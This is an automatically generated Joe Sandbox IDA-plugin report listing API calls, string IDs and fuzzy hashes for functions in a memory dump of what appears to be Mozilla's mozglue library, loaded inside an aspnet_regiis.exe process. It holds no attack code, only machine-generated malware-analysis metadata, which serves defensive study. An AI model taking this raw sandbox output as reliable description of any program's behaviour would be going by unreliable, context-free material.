                                                                                                                                                                    • Opcode ID: e591d9c17587e5c34c4ffd28ba98cda258a0236033f0e7b1f91b341596eec98d
                                                                                                                                                                    • Instruction ID: eda8b271d273fbcddc32dbf036038c19441f95371e9a7339167f7c96ea923bdb
                                                                                                                                                                    • Opcode Fuzzy Hash: e591d9c17587e5c34c4ffd28ba98cda258a0236033f0e7b1f91b341596eec98d
                                                                                                                                                                    • Instruction Fuzzy Hash: 68D138717042028FDB209F69D50A7AA77F8EB5636CF15457AE96983F81DB306808C7E2
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetModuleHandleW.KERNEL32(detoured.dll), ref: 6C7A64DF
                                                                                                                                                                    • GetModuleHandleW.KERNEL32(_etoured.dll), ref: 6C7A64F2
                                                                                                                                                                    • GetModuleHandleW.KERNEL32(nvd3d9wrap.dll), ref: 6C7A6505
                                                                                                                                                                    • GetModuleHandleW.KERNEL32(nvdxgiwrap.dll), ref: 6C7A6518
                                                                                                                                                                    • GetModuleHandleW.KERNEL32(user32.dll), ref: 6C7A652B
                                                                                                                                                                    • memcpy.VCRUNTIME140(?,?,?), ref: 6C7A671C
                                                                                                                                                                    • GetCurrentProcess.KERNEL32 ref: 6C7A6724
                                                                                                                                                                    • FlushInstructionCache.KERNEL32(00000000,00000000,00000000), ref: 6C7A672F
                                                                                                                                                                    • GetCurrentProcess.KERNEL32 ref: 6C7A6759
                                                                                                                                                                    • FlushInstructionCache.KERNEL32(00000000,00000000,00000000), ref: 6C7A6764
                                                                                                                                                                    • VirtualProtect.KERNEL32(?,00000000,?,?), ref: 6C7A6A80
                                                                                                                                                                    • GetSystemInfo.KERNEL32(?), ref: 6C7A6ABE
                                                                                                                                                                    • __Init_thread_footer.LIBCMT ref: 6C7A6AD3
                                                                                                                                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C7A6AE8
                                                                                                                                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C7A6AF7
                                                                                                                                                                    Strings
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: HandleModule$CacheCurrentFlushInstructionProcessfree$InfoInit_thread_footerProtectSystemVirtualmemcpy
                                                                                                                                                                    • String ID: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows$_etoured.dll$detoured.dll$nvd3d9wrap.dll$nvdxgiwrap.dll$user32.dll
                                                                                                                                                                    • API String ID: 487479824-2878602165
                                                                                                                                                                    • Opcode ID: 34a257032b37067b6627320b4952f84a59518a73319645b7ed4abc1a91f47ad6
                                                                                                                                                                    • Instruction ID: 686a76d48d1fb8fdecc8a3eb0d30734db46752a5d0a94818312033e6b2a4e7a3
                                                                                                                                                                    • Opcode Fuzzy Hash: 34a257032b37067b6627320b4952f84a59518a73319645b7ed4abc1a91f47ad6
                                                                                                                                                                    • Instruction Fuzzy Hash: BDF1F770A052199FDB20CFA8CE48B9AB7B5AF45318F1442B9D819E3B41D731AF85CF91
                                                                                                                                                                    Strings
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: memcpystrlen
                                                                                                                                                                    • String ID: (pre-xul)$data$name$schema
                                                                                                                                                                    • API String ID: 3412268980-999448898
                                                                                                                                                                    • Opcode ID: 0747a7f3b093614838bf42490fd879c3eb74d348fba1f5d39952e15bdc4e359d
                                                                                                                                                                    • Instruction ID: c00d9701951fb063feba53aa5df8d404655582ba410cf7cfd076f182c4bdd35e
                                                                                                                                                                    • Opcode Fuzzy Hash: 0747a7f3b093614838bf42490fd879c3eb74d348fba1f5d39952e15bdc4e359d
                                                                                                                                                                    • Instruction Fuzzy Hash: 07E18FB1B043418BC710CF68C94565BFBEABB85318F558E2DE899D7780DB70ED098B91
                                                                                                                                                                    APIs
                                                                                                                                                                    • EnterCriticalSection.KERNEL32(6C81E784,?,?,?,?,?,?,?,00000000,76232FE0,00000001,?,6C7CD1C5), ref: 6C7BD4F2
                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(6C81E784,?,?,?,?,?,?,?,00000000,76232FE0,00000001,?,6C7CD1C5), ref: 6C7BD50B
                                                                                                                                                                      • Part of subcall function 6C79CFE0: EnterCriticalSection.KERNEL32(6C81E784), ref: 6C79CFF6
                                                                                                                                                                      • Part of subcall function 6C79CFE0: LeaveCriticalSection.KERNEL32(6C81E784), ref: 6C79D026
                                                                                                                                                                    • InitializeCriticalSectionAndSpinCount.KERNEL32(0000000C,00001388,?,?,?,?,?,?,?,00000000,76232FE0,00000001,?,6C7CD1C5), ref: 6C7BD52E
                                                                                                                                                                    • EnterCriticalSection.KERNEL32(6C81E7DC), ref: 6C7BD690
                                                                                                                                                                    • ?RandomUint64@mozilla@@YA?AV?$Maybe@_K@1@XZ.MOZGLUE(?), ref: 6C7BD6A6
                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(6C81E7DC), ref: 6C7BD712
                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(6C81E784,?,?,?,?,?,?,?,00000000,76232FE0,00000001,?,6C7CD1C5), ref: 6C7BD751
                                                                                                                                                                    • ?RandomUint64@mozilla@@YA?AV?$Maybe@_K@1@XZ.MOZGLUE(?), ref: 6C7BD7EA
                                                                                                                                                                    Strings
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CriticalSection$Leave$Enter$K@1@Maybe@_RandomUint64@mozilla@@$CountInitializeSpin
                                                                                                                                                                    • String ID: : (malloc) Error initializing arena$<jemalloc>
                                                                                                                                                                    • API String ID: 2690322072-3894294050
                                                                                                                                                                    • Opcode ID: c32f9dd7e2e07834a4d7f21a298a3b1b0034ddb1c55ecc86f6b0c70b0db5659b
                                                                                                                                                                    • Instruction ID: 2aeecfb424257bb08660e4ca2b2ce215d5cc039eb86e7f439ad1b521c33ee9fb
                                                                                                                                                                    • Opcode Fuzzy Hash: c32f9dd7e2e07834a4d7f21a298a3b1b0034ddb1c55ecc86f6b0c70b0db5659b
                                                                                                                                                                    • Instruction Fuzzy Hash: 6591C371A047028FD724CF38C29466AB7E1EBA9318F14893EE55AD7F85D730E844CB86
                                                                                                                                                                    APIs
                                                                                                                                                                    • Sleep.KERNEL32(000007D0), ref: 6C7F4EFF
                                                                                                                                                                    • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C7F4F2E
                                                                                                                                                                    • moz_xmalloc.MOZGLUE ref: 6C7F4F52
                                                                                                                                                                    • memset.VCRUNTIME140(00000000,00000000), ref: 6C7F4F62
                                                                                                                                                                    • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C7F52B2
                                                                                                                                                                    • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C7F52E6
                                                                                                                                                                    • Sleep.KERNEL32(00000010), ref: 6C7F5481
                                                                                                                                                                    • free.MOZGLUE(?), ref: 6C7F5498
                                                                                                                                                                    Strings
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: floor$Sleep$freememsetmoz_xmalloc
                                                                                                                                                                    • String ID: (
                                                                                                                                                                    • API String ID: 4104871533-3887548279
                                                                                                                                                                    • Opcode ID: e2c63972ec8334da7cb222abf955668e240531d1aa27fe956c795990594ad458
                                                                                                                                                                    • Instruction ID: 04e5ec7831d920bb8ce2a26b863bce51f670b87a702449886eb26d0cb9049f20
                                                                                                                                                                    • Opcode Fuzzy Hash: e2c63972ec8334da7cb222abf955668e240531d1aa27fe956c795990594ad458
                                                                                                                                                                    • Instruction Fuzzy Hash: 46F1B171A18B018FC726CF39C85162BB7F9AFD6388F05872EF856A7651DB319442CB81
                                                                                                                                                                    APIs
                                                                                                                                                                    • EnterCriticalSection.KERNEL32(6C81E744), ref: 6C7A7885
                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(6C81E744), ref: 6C7A78A5
                                                                                                                                                                    • EnterCriticalSection.KERNEL32(6C81E784), ref: 6C7A78AD
                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(6C81E784), ref: 6C7A78CD
                                                                                                                                                                    • EnterCriticalSection.KERNEL32(6C81E7DC), ref: 6C7A78D4
                                                                                                                                                                    • memset.VCRUNTIME140(?,00000000,00000158), ref: 6C7A78E9
                                                                                                                                                                    • EnterCriticalSection.KERNEL32(00000000), ref: 6C7A795D
                                                                                                                                                                    • memset.VCRUNTIME140(?,00000000,00000160), ref: 6C7A79BB
                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(?), ref: 6C7A7BBC
                                                                                                                                                                    • memset.VCRUNTIME140(?,00000000,00000158), ref: 6C7A7C82
                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(6C81E7DC), ref: 6C7A7CD2
                                                                                                                                                                    • memset.VCRUNTIME140(00000000,00000000,00000450), ref: 6C7A7DAF
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CriticalSection$EnterLeavememset
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 759993129-0
                                                                                                                                                                    • Opcode ID: 0d45476715fdaa5c473f2a42b9e7c1f3767cecc4b925761506db9373d474e4d3
                                                                                                                                                                    • Instruction ID: 654dd4ccd7b0a551c1427887483e10b17e056184dd07f572c5020e20184694c0
                                                                                                                                                                    • Opcode Fuzzy Hash: 0d45476715fdaa5c473f2a42b9e7c1f3767cecc4b925761506db9373d474e4d3
                                                                                                                                                                    • Instruction Fuzzy Hash: 9D027271A0121ACFDB54CF59CA84799B7B5FF88318F2582AAD809A7715D730BE91CF80
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetLastError.KERNEL32 ref: 6C7F7046
                                                                                                                                                                    • FormatMessageA.KERNEL32(00001300,00000000,00000000,00000400,?,00000000,00000000), ref: 6C7F7060
                                                                                                                                                                    • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 6C7F707E
                                                                                                                                                                      • Part of subcall function 6C7A81B0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,?,?,00000000,?,ProfileBuffer parse error: %s,expected a ProfilerOverheadDuration entry after ProfilerOverheadTime), ref: 6C7A81DE
                                                                                                                                                                    • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 6C7F7096
                                                                                                                                                                    • fflush.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 6C7F709C
                                                                                                                                                                    • LocalFree.KERNEL32(?), ref: 6C7F70AA
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3402785272.000000006C791000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C790000, based on PE: true
                                                                                                                                                                    • Associated: 00000003.00000002.3402710092.000000006C790000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                    • Associated: 00000003.00000002.3402896622.000000006C80D000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                    • Associated: 00000003.00000002.3402949769.000000006C81E000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                    • Associated: 00000003.00000002.3402999327.000000006C822000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c790000_aspnet_regiis.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: __acrt_iob_func$ErrorFormatFreeLastLocalMessage__stdio_common_vfprintffflush
                                                                                                                                                                    • String ID: ### ERROR: %s: %s$(null)
                                                                                                                                                                    • API String ID: 2989430195-1695379354
                                                                                                                                                                    • Opcode ID: ae0d42dbe7ec857c8ad52c6c9ffcd08d1ce24f19baa84c545743b1a864b65400
                                                                                                                                                                    • Instruction ID: 8d8858cbff70002cde4e999b4d56fe1a29e68f509fc33d0968099b88bb1fa886
                                                                                                                                                                    • Opcode Fuzzy Hash: ae0d42dbe7ec857c8ad52c6c9ffcd08d1ce24f19baa84c545743b1a864b65400
                                                                                                                                                                    • Instruction Fuzzy Hash: 8C0184B2A00109AFDB145BA5DC4EDAB7BFCEF49258B010439FA05A2B41D6716918CBE1
                                                                                                                                                                    APIs
                                                                                                                                                                    • ?EcmaScriptConverter@DoubleToStringConverter@double_conversion@@SAABV12@XZ.MOZGLUE ref: 6C7E2C31
                                                                                                                                                                    • ?ToShortestIeeeNumber@DoubleToStringConverter@double_conversion@@ABE_NNPAVStringBuilder@2@W4DtoaMode@12@@Z.MOZGLUE ref: 6C7E2C61
                                                                                                                                                                      • Part of subcall function 6C794DE0: ?DoubleToAscii@DoubleToStringConverter@double_conversion@@SAXNW4DtoaMode@12@HPADHPA_NPAH3@Z.MOZGLUE ref: 6C794E5A
                                                                                                                                                                      • Part of subcall function 6C794DE0: ?CreateDecimalRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHHPAVStringBuilder@2@@Z.MOZGLUE(?,?,?,?,?), ref: 6C794E97
                                                                                                                                                                    • strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6C7E2C82
                                                                                                                                                                    • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 6C7E2E2D
                                                                                                                                                                      • Part of subcall function 6C7A81B0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,?,?,00000000,?,ProfileBuffer parse error: %s,expected a ProfilerOverheadDuration entry after ProfilerOverheadTime), ref: 6C7A81DE
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3402785272.000000006C791000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C790000, based on PE: true
                                                                                                                                                                    • Associated: 00000003.00000002.3402710092.000000006C790000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                    • Associated: 00000003.00000002.3402896622.000000006C80D000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                    • Associated: 00000003.00000002.3402949769.000000006C81E000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                    • Associated: 00000003.00000002.3402999327.000000006C822000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c790000_aspnet_regiis.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: String$Double$Converter@double_conversion@@$Dtoa$Ascii@Builder@2@Builder@2@@Converter@CreateDecimalEcmaIeeeMode@12@Mode@12@@Number@Representation@ScriptShortestV12@__acrt_iob_func__stdio_common_vfprintfstrlen
                                                                                                                                                                    • String ID: (root)$ProfileBuffer parse error: %s$expected a Time entry
                                                                                                                                                                    • API String ID: 801438305-4149320968
                                                                                                                                                                    • Opcode ID: 5681da29a4f2b62af4b7326fd123bdc2cebeeb97b9b07b9c9f8fd3c90446043e
                                                                                                                                                                    • Instruction ID: 398c7679de5f033cad3f97ed83f189114eb597e6ae60c464d6e15f15b64c5734
                                                                                                                                                                    • Opcode Fuzzy Hash: 5681da29a4f2b62af4b7326fd123bdc2cebeeb97b9b07b9c9f8fd3c90446043e
                                                                                                                                                                    • Instruction Fuzzy Hash: 1C91D2726087428FC724CF28C58969FB7E0AFC9358F104D2DE59A8BB60DB30D949CB52
                                                                                                                                                                    APIs
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3402785272.000000006C791000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C790000, based on PE: true
                                                                                                                                                                    • Associated: 00000003.00000002.3402710092.000000006C790000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                    • Associated: 00000003.00000002.3402896622.000000006C80D000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                    • Associated: 00000003.00000002.3402949769.000000006C81E000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                    • Associated: 00000003.00000002.3402999327.000000006C822000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c790000_aspnet_regiis.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: __aulldiv__aullrem
                                                                                                                                                                    • String ID: -Infinity$NaN
                                                                                                                                                                    • API String ID: 3839614884-2141177498
                                                                                                                                                                    • Opcode ID: 53b17d96b48c00e36ef2b9d0ef523a43733321107cbed980537a53c2fc9c7761
                                                                                                                                                                    • Instruction ID: a0d240c80e9119c69dcdb5f9cf086b71a68328f308a8261739ba931d7fd03116
                                                                                                                                                                    • Opcode Fuzzy Hash: 53b17d96b48c00e36ef2b9d0ef523a43733321107cbed980537a53c2fc9c7761
                                                                                                                                                                    • Instruction Fuzzy Hash: 21C1DE31F043198FDB14CFA8CA8479EB7B6FB84324F15452DD425ABB80DB71A94ACB91
                                                                                                                                                                    APIs
                                                                                                                                                                    • memset.VCRUNTIME140(?,000000FF,?), ref: 6C808A4B
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3402785272.000000006C791000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C790000, based on PE: true
                                                                                                                                                                    • Associated: 00000003.00000002.3402710092.000000006C790000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                    • Associated: 00000003.00000002.3402896622.000000006C80D000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                    • Associated: 00000003.00000002.3402949769.000000006C81E000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                    • Associated: 00000003.00000002.3402999327.000000006C822000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c790000_aspnet_regiis.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: memset
                                                                                                                                                                    • String ID: ~qyl
                                                                                                                                                                    • API String ID: 2221118986-1164895512
                                                                                                                                                                    • Opcode ID: 83bd3679e087d2f8c0a363543460151d132c5b050c0c1d93b1d77d16f48f2b37
                                                                                                                                                                    • Instruction ID: b67ec6e34cba9fa6512ae4c01e99be038dc335e368658739ab64a4667c984d3b
                                                                                                                                                                    • Opcode Fuzzy Hash: 83bd3679e087d2f8c0a363543460151d132c5b050c0c1d93b1d77d16f48f2b37
                                                                                                                                                                    • Instruction Fuzzy Hash: 37B1D472B0021ACFDB24CF68CD917A9B7B2EF85314F1906A9C549EB781D730A985CB91
                                                                                                                                                                    APIs
                                                                                                                                                                    • memset.VCRUNTIME140(?,000000FF,?), ref: 6C8088F0
                                                                                                                                                                    • memset.VCRUNTIME140(?,000000FF,?,?), ref: 6C80925C
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3402785272.000000006C791000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C790000, based on PE: true
                                                                                                                                                                    • Associated: 00000003.00000002.3402710092.000000006C790000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                    • Associated: 00000003.00000002.3402896622.000000006C80D000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                    • Associated: 00000003.00000002.3402949769.000000006C81E000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                    • Associated: 00000003.00000002.3402999327.000000006C822000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c790000_aspnet_regiis.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: memset
                                                                                                                                                                    • String ID: ~qyl
                                                                                                                                                                    • API String ID: 2221118986-1164895512
                                                                                                                                                                    • Opcode ID: 79f258be636af245f773d231f88ec99e234031016a7ca9cdfbf0dc900f23d892
                                                                                                                                                                    • Instruction ID: 16308fe08f6f88023c83867b9bbf13cb2b449226b1f8d7bd0400b4671a9cc12f
                                                                                                                                                                    • Opcode Fuzzy Hash: 79f258be636af245f773d231f88ec99e234031016a7ca9cdfbf0dc900f23d892
                                                                                                                                                                    • Instruction Fuzzy Hash: B3B1C572F0160ACFDB24CE68CD816E9B7B2EF85314F150679C949EB785D730A989CB90
                                                                                                                                                                    APIs
                                                                                                                                                                    • memset.VCRUNTIME140(?,000000FF,80808082), ref: 6C808E18
                                                                                                                                                                    • memset.VCRUNTIME140(?,000000FF,?,?), ref: 6C80925C
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3402785272.000000006C791000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C790000, based on PE: true
                                                                                                                                                                    • Associated: 00000003.00000002.3402710092.000000006C790000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                    • Associated: 00000003.00000002.3402896622.000000006C80D000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                    • Associated: 00000003.00000002.3402949769.000000006C81E000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                    • Associated: 00000003.00000002.3402999327.000000006C822000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c790000_aspnet_regiis.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: memset
                                                                                                                                                                    • String ID: ~qyl
                                                                                                                                                                    • API String ID: 2221118986-1164895512
                                                                                                                                                                    • Opcode ID: 8a04f876341ba59a6ddb8d2d2d5789db075aee54b4cc3de998e3f034435ba008
                                                                                                                                                                    • Instruction ID: 8ecc29be80798f407ddf7d8e52e29f51b68715e55e6ae3668bfe8b424f9ecc09
                                                                                                                                                                    • Opcode Fuzzy Hash: 8a04f876341ba59a6ddb8d2d2d5789db075aee54b4cc3de998e3f034435ba008
                                                                                                                                                                    • Instruction Fuzzy Hash: ACA1D772F0021ACFCB24CE68CD90799B7B2AF85314F1546B9C949EB785D730A999CB90
                                                                                                                                                                    APIs
                                                                                                                                                                    • ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C7E7A81
                                                                                                                                                                    • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 6C7E7A93
                                                                                                                                                                      • Part of subcall function 6C7B5C50: GetTickCount64.KERNEL32 ref: 6C7B5D40
                                                                                                                                                                      • Part of subcall function 6C7B5C50: EnterCriticalSection.KERNEL32(6C81F688), ref: 6C7B5D67
                                                                                                                                                                    • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?), ref: 6C7E7AA1
                                                                                                                                                                      • Part of subcall function 6C7B5C50: __aulldiv.LIBCMT ref: 6C7B5DB4
                                                                                                                                                                      • Part of subcall function 6C7B5C50: LeaveCriticalSection.KERNEL32(6C81F688), ref: 6C7B5DED
                                                                                                                                                                    • ?ToSeconds@BaseTimeDurationPlatformUtils@mozilla@@SAN_J@Z.MOZGLUE(FFFFFFFE,?,?,?), ref: 6C7E7B31
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3402785272.000000006C791000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C790000, based on PE: true
                                                                                                                                                                    • Associated: 00000003.00000002.3402710092.000000006C790000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                    • Associated: 00000003.00000002.3402896622.000000006C80D000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                    • Associated: 00000003.00000002.3402949769.000000006C81E000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                    • Associated: 00000003.00000002.3402999327.000000006C822000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c790000_aspnet_regiis.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Time$CriticalSectionStampV01@@Value@mozilla@@$BaseCount64DurationEnterLeaveNow@PlatformSeconds@Stamp@mozilla@@TickUtils@mozilla@@V12@___aulldiv
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 4054851604-0
                                                                                                                                                                    APIs
                                                                                                                                                                    • LoadLibraryW.KERNEL32(user32,?,6C7CE1A5), ref: 6C7F5606
                                                                                                                                                                    • LoadLibraryW.KERNEL32(gdi32,?,6C7CE1A5), ref: 6C7F560F
                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,GetThreadDpiAwarenessContext), ref: 6C7F5633
                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,AreDpiAwarenessContextsEqual), ref: 6C7F563D
                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,EnableNonClientDpiScaling), ref: 6C7F566C
                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,GetSystemMetricsForDpi), ref: 6C7F567D
                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,GetDpiForWindow), ref: 6C7F5696
                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,RegisterClassW), ref: 6C7F56B2
                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,CreateWindowExW), ref: 6C7F56CB
                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,ShowWindow), ref: 6C7F56E4
                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,SetWindowPos), ref: 6C7F56FD
                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,GetWindowDC), ref: 6C7F5716
                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,FillRect), ref: 6C7F572F
                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,ReleaseDC), ref: 6C7F5748
                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,LoadIconW), ref: 6C7F5761
                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,LoadCursorW), ref: 6C7F577A
                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,MonitorFromWindow), ref: 6C7F5793
                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,GetMonitorInfoW), ref: 6C7F57A8
                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,SetWindowLongPtrW), ref: 6C7F57BD
                                                                                                                                                                    • GetProcAddress.KERNEL32(?,StretchDIBits), ref: 6C7F57D5
                                                                                                                                                                    • GetProcAddress.KERNEL32(?,CreateSolidBrush), ref: 6C7F57EA
                                                                                                                                                                    • GetProcAddress.KERNEL32(?,DeleteObject), ref: 6C7F57FF
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3402785272.000000006C791000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C790000, based on PE: true
                                                                                                                                                                    • Associated: 00000003.00000002.3402710092.000000006C790000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                    • Associated: 00000003.00000002.3402896622.000000006C80D000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                    • Associated: 00000003.00000002.3402949769.000000006C81E000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                    • Associated: 00000003.00000002.3402999327.000000006C822000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c790000_aspnet_regiis.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: AddressProc$LibraryLoad
                                                                                                                                                                    • String ID: AreDpiAwarenessContextsEqual$CreateSolidBrush$CreateWindowExW$DeleteObject$EnableNonClientDpiScaling$FillRect$GetDpiForWindow$GetMonitorInfoW$GetSystemMetricsForDpi$GetThreadDpiAwarenessContext$GetWindowDC$LoadCursorW$LoadIconW$MonitorFromWindow$RegisterClassW$ReleaseDC$SetWindowLongPtrW$SetWindowPos$ShowWindow$StretchDIBits$gdi32$user32
                                                                                                                                                                    • API String ID: 2238633743-1964193996
                                                                                                                                                                    APIs
                                                                                                                                                                    • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,default,?,6C7A582D), ref: 6C7DCC27
                                                                                                                                                                    • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,java,?,?,?,6C7A582D), ref: 6C7DCC3D
                                                                                                                                                                    • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,6C80FE98,?,?,?,?,?,6C7A582D), ref: 6C7DCC56
                                                                                                                                                                    • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,leaf,?,?,?,?,?,?,?,6C7A582D), ref: 6C7DCC6C
                                                                                                                                                                    • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,mainthreadio,?,?,?,?,?,?,?,?,?,6C7A582D), ref: 6C7DCC82
                                                                                                                                                                    • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,fileio,?,?,?,?,?,?,?,?,?,?,?,6C7A582D), ref: 6C7DCC98
                                                                                                                                                                    • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,fileioall,?,?,?,?,?,?,?,?,?,?,?,?,?,6C7A582D), ref: 6C7DCCAE
                                                                                                                                                                    • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,noiostacks), ref: 6C7DCCC4
                                                                                                                                                                    • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,screenshots), ref: 6C7DCCDA
                                                                                                                                                                    • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,seqstyle), ref: 6C7DCCEC
                                                                                                                                                                    • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,stackwalk), ref: 6C7DCCFE
                                                                                                                                                                    • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,jsallocations), ref: 6C7DCD14
                                                                                                                                                                    • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,nostacksampling), ref: 6C7DCD82
